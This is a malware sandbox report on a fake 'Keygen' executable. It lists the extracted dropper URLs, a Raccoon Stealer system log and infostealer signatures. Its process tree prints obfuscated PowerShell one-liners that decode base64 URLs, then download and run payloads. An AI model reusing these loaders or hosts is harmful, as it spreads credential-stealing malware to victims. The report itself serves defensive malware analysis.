Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    93s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    02-10-2020 21:14

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (90) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 21:44:29 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (611 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 37 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (90) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (90) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1424
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (90) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1360
      • C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1760
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1848
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1904
          • C:\Users\Public\uci.exe
            "C:\Users\Public\uci.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2296
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2368
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2528
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2528 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\100172902659453\\* & exit
                  8⤵
                    PID:1168
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2528
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2876
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2400
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2480
              • C:\Users\Public\uci.exe
                "C:\Users\Public\uci.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2440
                • C:\Users\Admin\AppData\Local\Temp\jYued9RsaG.exe
                  "C:\Users\Admin\AppData\Local\Temp\jYued9RsaG.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2156
                • C:\Users\Admin\AppData\Local\Temp\tzYi5pW3H7.exe
                  "C:\Users\Admin\AppData\Local\Temp\tzYi5pW3H7.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2132
                • C:\Users\Admin\AppData\Local\Temp\ewRawcVTtt.exe
                  "C:\Users\Admin\AppData\Local\Temp\ewRawcVTtt.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2228
                • C:\Users\Admin\AppData\Local\Temp\pgoFB6KoYZ.exe
                  "C:\Users\Admin\AppData\Local\Temp\pgoFB6KoYZ.exe"
                  7⤵
                  • Executes dropped EXE
                  • Windows security modification
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2656
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" Get-MpPreference -verbose
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2412
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\uci.exe"
                  7⤵
                    PID:2484
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /T 10 /NOBREAK
                      8⤵
                      • Delays execution with timeout.exe
                      PID:1116
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\m1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1664
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1964
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            3⤵
            • Delays execution with timeout.exe
            PID:1528
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\b.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1052
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:764
              • C:\Users\Public\dzl.exe
                "C:\Users\Public\dzl.exe"
